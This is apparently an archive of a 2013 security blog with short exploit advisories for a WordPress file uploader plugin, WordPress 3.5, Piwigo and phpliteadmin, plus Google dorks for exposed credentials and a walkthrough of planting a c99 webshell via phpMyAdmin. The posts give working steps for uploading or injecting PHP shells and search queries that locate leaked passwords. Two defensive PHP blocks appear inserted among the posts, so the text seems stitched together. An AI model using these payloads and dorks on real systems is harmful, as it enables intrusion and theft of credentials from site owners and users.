Archive for L@usch

WordPress File Uploader Plugin PHP File Upload Vulnerability with Video Demonstration

# Exploit Title: WordPress File Uploader Plugin PHP File Upload Vulnerability
# Date: 01/21/2013
# Google Dork: inurl:"wp-file-uploader.php"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-file-uploader-1.1.txt
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-file-uploader/
# Software Link: http://downloads.wordpress.org/plugin/wp-file-uploader.zip
# Version: 1.1 and probably prior
# Tested on: WordPress 3.5 on Windows and Linux

Vulnerable Code: (process-form.php)

97: $filepart = fileinformation( $_FILES['postimage']['name'] );
98: $filename = $filepart['basename'];
99: // check if this filename already exist in the folder
100: $i = 2;
101: while ( in_array( $filename, $imageslist ) ) {
102: $filename = $filepart['filename'] . '_' . $i++ . '.' .$filepart['extension'];
103: }
104: move_uploaded_file($_FILES["postimage"]["tmp_name"], $file_path.$filename);

Description:

The plugin simply stores the attachment under its original name and extension in "wp-content/uploads/".
An attacker can therefore upload PHP files and access them remotely.
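As an added defensive example (my code, not the plugin's), here is how the process-form.php logic quoted above can be hardened so that an attacker-chosen name such as shell.php is never written into the uploads directory. It assumes PHP 7 or later with the fileinfo extension; the function name and $uploadDir are placeholders of mine.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for lines 97-104 of
// process-form.php. $uploadDir is an assumed parameter (the plugin's $file_path).

function store_uploaded_image(array $file, string $uploadDir): string
{
    // Allowlist of what the "postimage" form field is meant to accept, with the MIME
    // type each extension must carry. Anything else (php, phtml, ...) is rejected.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png',  'gif'  => 'image/gif'];

    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // The client-supplied name is used only for this check, never as the stored name.
    // A double extension like "shell.php.jpg" yields "jpg" here and then fails the
    // content check below, because its bytes are PHP source, not a JPEG.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, $allowed)) {
        throw new RuntimeException('Extension not permitted');
    }

    // Check the actual content, not just the name (fileinfo extension).
    $mime = finfo_file(finfo_open(FILEINFO_MIME_TYPE), $file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }

    // Random basename: the attacker controls neither basename nor extension, and the
    // original's collision loop over $imageslist is no longer needed.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($target, 0644);   // a data file, never executable
    return $name;
}

// Usage in place of the original line 104:
// $stored = store_uploaded_image($_FILES['postimage'], $file_path);
```

Even with this check in place, the uploads directory should have script execution disabled in the web server configuration, so that anything that does land there is served as data.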

Proof of Concept:

1. Visit the vulnerable target and navigate to the "File Uploader" page.
2. Upload a file named shell.php.
3. Access it in the browser at example.com/wp-content/uploads/shell.php

Done!

Proof Video: http://goo.gl/ogbsA

Cheers

L@usch

WordPress 3.5 Path Disclosure Vulnerability

# Exploit Title: WordPress 3.5 Path Disclosure Vulnerability
# Date: 01/19/2013
# Google Dork: intext:"powered by WordPress"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-3.5.txt
# Vendor Homepage: http://wordpress.org/
# Software Link: http://wordpress.org/latest.zip
# Version: 3.5 and probably prior
# Tested on: Windows

Description:

Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the WordPress installation.

Proof of Concept:

--------------------------------------

POST /wordpress/wp-includes/js/tinymce/plugins/spellchecker/rpc.php HTTP/1.1
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

json_data[$hack]=1

--------------------------------------

Done!

Proof: http://goo.gl/PPhWf

Cheers

L@usch

Piwigo 2.4.6 Full Path Disclosure Vulnerability

http://la.usch.io/files/exploits/piwigo-2.4.6.txt

# Exploit Title: Piwigo 2.4.6 Full Path Disclosure Vulnerability
# Date: 01/12/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/piwigo-2.4.6.txt
# Vendor Homepage: http://piwigo.org/
# Vendor Status: Informed
# Software Link: http://piwigo.org/download/dlcounter.php?code=latest
# Version: 2.4.6 and probably prior
# Tested on: Windows and Linux

Description:

Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the Piwigo installation.

Proof of Concept:

http://example.com/feed.php?feed=%

Done!

Proof: http://goo.gl/UQm4W

Cheers

L@usch

Hacking Demonstration for phpliteadmin 1.9.3 and prior POC-Exploit – Infect targets with a Webshell

Hacking Demonstration Screencast for my POC-Exploit that you can find here:

http://la.usch.io/2013/01/10/phpliteadmin-1-9-3-remote-php-code-injection-vulnerability/


Google Dork:

http://www.google.com/search?q=inurl:phpliteadmin.php

Cheers

L@usch

phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability Exploit

http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt

# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' => 
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An attacker can create an SQLite database with a .php extension and insert PHP code into text fields. The attacker can then execute it simply by accessing the database file with a web browser.

Proof of Concept:

1. We create a database named "hack.php".
(Depending on the server configuration this sometimes does not work and the database is named "hack.sqlite". In that case, simply rename the database / an existing database to "hack.php".)
The script stores the SQLite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL
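As an added detection example (my code, not phpliteadmin's or WordPress's), the script below walks a directory and reports server-executable files, labelling those whose first bytes are a SQLite header or an image signature. That is exactly what a database named hack.php (this post) or a script dropped into wp-content/uploads (the File Uploader post above) looks like on disk. The directory argument and the extension list are assumptions.

```php
<?php
// Added example: find script files in a directory that should only hold data.
// Magic bytes of formats PHP code can be hidden inside; a *.php file starting with
// one of these is the polyglot pattern described above (SQLite database named hack.php).
const DATA_MAGICS = [
    "SQLite format 3\0" => 'sqlite',
    "\x89PNG\r\n\x1a\n"  => 'png',
    "\xFF\xD8\xFF"       => 'jpeg',
    "GIF8"               => 'gif',
];
// Extensions a typical PHP handler executes (assumed list; adjust to the server config).
const SCRIPT_EXTS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar'];

function find_disguised_scripts(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $info) {
        if (!$info->isFile()) continue;
        if (!in_array(strtolower($info->getExtension()), SCRIPT_EXTS, true)) continue;

        $path = $info->getPathname();
        $head = (string) file_get_contents($path, false, null, 0, 16);
        $kind = 'script';                       // plain uploaded script (the shell.php case)
        foreach (DATA_MAGICS as $magic => $label) {
            if (strncmp($head, $magic, strlen($magic)) === 0) {
                $kind = $label . ' polyglot';   // data file carrying a script extension
                break;
            }
        }
        $findings[] = [
            'path'        => $path,
            'kind'        => $kind,
            // An opening PHP tag anywhere in the body is what makes the polyglot dangerous.
            'has_php_tag' => strpos((string) file_get_contents($path), '<?php') !== false,
        ];
    }
    return $findings;
}

foreach (find_disguised_scripts($argv[1] ?? 'wp-content/uploads') as $f) {
    printf("%-16s %-4s %s\n", $f['kind'], $f['has_php_tag'] ? 'PHP' : '-', $f['path']);
}
```

For a data-only directory such as wp-content/uploads every reported line is a finding; for the directory that holds phpliteadmin.php itself, the "sqlite polyglot" label is the signal.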


Hacking Demonstration Screencast for this Exploit:

http://la.usch.io/2013/01/11/hacking-demonstration-for-phpliteadmin-1-9-3-remote-php-code-injection-vulnerability-infect-targets-with-a-webshell/

Cheers

L@usch

My Google Dork #2 -> Find Gnucash Databases containing juicy info

Google Search:

http://goo.gl/rfxR7

Description:

Find Gnucash Databases containing juicy info.

Cheers

L@usch

My Google Dork #1 -> Find Accounts and Passwords from Pidgin users

Google Search:

http://goo.gl/86FyN

Description:

Find accounts and passwords from Pidgin users.
Google limits queries to 32 words, so it's impossible to search for all account types in one query!

List of all parameters: feel free to build your own search query.

proto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour; prpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn; prpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah; prpl-irc; prpl-yabber

Cheers

L@usch

GHDB Hacking Demonstration for #3825@exploit-db > How to infect targets with a Webshell over phpMyAdmin

Hacking Demonstration Screencast for
#3825@exploit-db.org/ghdb

I will use this Google Dork to infect my Test Server with a Webshell over phpMyAdmin.

Google GHDB Search result preview:

http://goo.gl/maoTw

Good! I can see a lot of websites that have open phpMyAdmin access and use “root” as the MySQL user. Some of them use Windows as the OS and bundled web server solutions like XAMPP.

So let's simulate a target with VMware. I simply use my sandbox (Windows 7 x64) and installed XAMPP for Windows.

phpMyAdmin is accessible and uses “root” as the MySQL user.

As webshell I use c99.


Cheers

L@usch

Google hate you!? Or are you just stupid?

I am so bored today, so I played a little with the GHDB from exploit-db.com and modified some searches for better use and “unique” results.

http://www.exploit-db.com/google-dorks/

I have known it since Johnny from hackersforcharity.org released it on his site, but I never spent so much enthusiasm on it.

And yes! That gives me a “little” fun and provides a good way to waste my time!

It's amazing how easily people can “gain access” (I'm not sure whether we can call using the GHDB hacking) to random targets with the GHDB!

https://www.google.com/search?q=inurl:/wp-content/w3tc/dbcache/
https://www.google.com/search?q=ext:xml%20(%22mode_passive%22%7C%22mode_default%22)
https://www.google.com/search?q=filetype:xls%20%22username%20%7C%20password%22
https://www.google.com/search?q=inurl:ckfinder%20intext:%22ckfinder.html%22%20intitle:%22Index%20of%20/ckfinder%22

I was a little crazy when I saw this and I was thinking about…

“Guys”, what's wrong with “you”? How shameful that you can get owned by Google searches.

How can “you” store / leave files containing passwords and other sensitive data on your servers? And how can you leave them accessible to Google bots and web guests?…

Is the web not unsafe enough without this issue?

I don't wonder about such stuff. It's always the same, so I thought this was nothing special. But after a short time it became unbelievable for me, because I also found sensitive data like ftp/ssh/vnc/rdp/… accounts from famous companies, access to shops with a lot of credit card information, direct access to private computers with static IPs or DynDNS from developers/administrators managing hundreds of servers, backup servers of different companies including source code from commercial software, and also access data for servers from organisations like:

Marvel Studios
Buena Vista
Disney
*.gov* Sites
and
Different IT service and security companies *cough* that provide enterprise and gov. solutions.

A little list of clients/partners of some target IT companies: (domain only for privacy)


and a lot more…

Puh, people don't wonder why/how different “big” companies and systems get owned all the time if they work with such firms…

The funny part was -> reporting the issues to the people behind a target was harder than getting access to their resources!

It puzzled me that I really needed more time to find a way to contact the people behind the targets :-)

So what can I say?…

Nobody is perfect. We are just humans.
And my mother wants me to clean my room and this breaks my creativity.
And my teacher tells me a lot of crap and mostly I believe him.
And three days of coding without sleep result in fails.
And I read stupid magazines about security.
And hey, I just finished my studies and learned to be successful from people who are not successful.

And and and…

So, it seems I'm about to go crazy! I have to watch how the people that “maybe could be safer” release to the public all the data needed to get hacked… An open door for everybody!

Let's write a new book, guys!

[Image: “Hacking with GHDB for Dummies” fun book cover]

I did all this today to waste my time and to feel better… I think I was not fully successful :-(
I wasted my time, but I'm not happy!

So, what I have in my mind now:

Holes, bugs, github, fails, ghdb, open source, gpl, cve, hackers, ddos, misconfiguration, foreign code, bad coders, good coders, bad work, good work, svn, hackernews, metasploit, sf.net… And all of it goes in and out and around my head!!! :-D

And as if this were not enough for me! -> I was just finishing this post and then had to see this:

https://twitter.com/YourAnonNews/status/288034487361736704

What's wrong with the security and the people?…

I have to drink a beer now…

Cheers

L@usch

Welcome to my new Blog!

Having a boring day…

So I simply set up my new domain and blog.
I'm really happy about my new domain hack and the associated email address :-)

l@ausch.io

But this didn't help me out of my boredom today :-(

So I will do a little more now. Let's see what I can do… Come back to see my next post(s) in an hour or so…

L@usch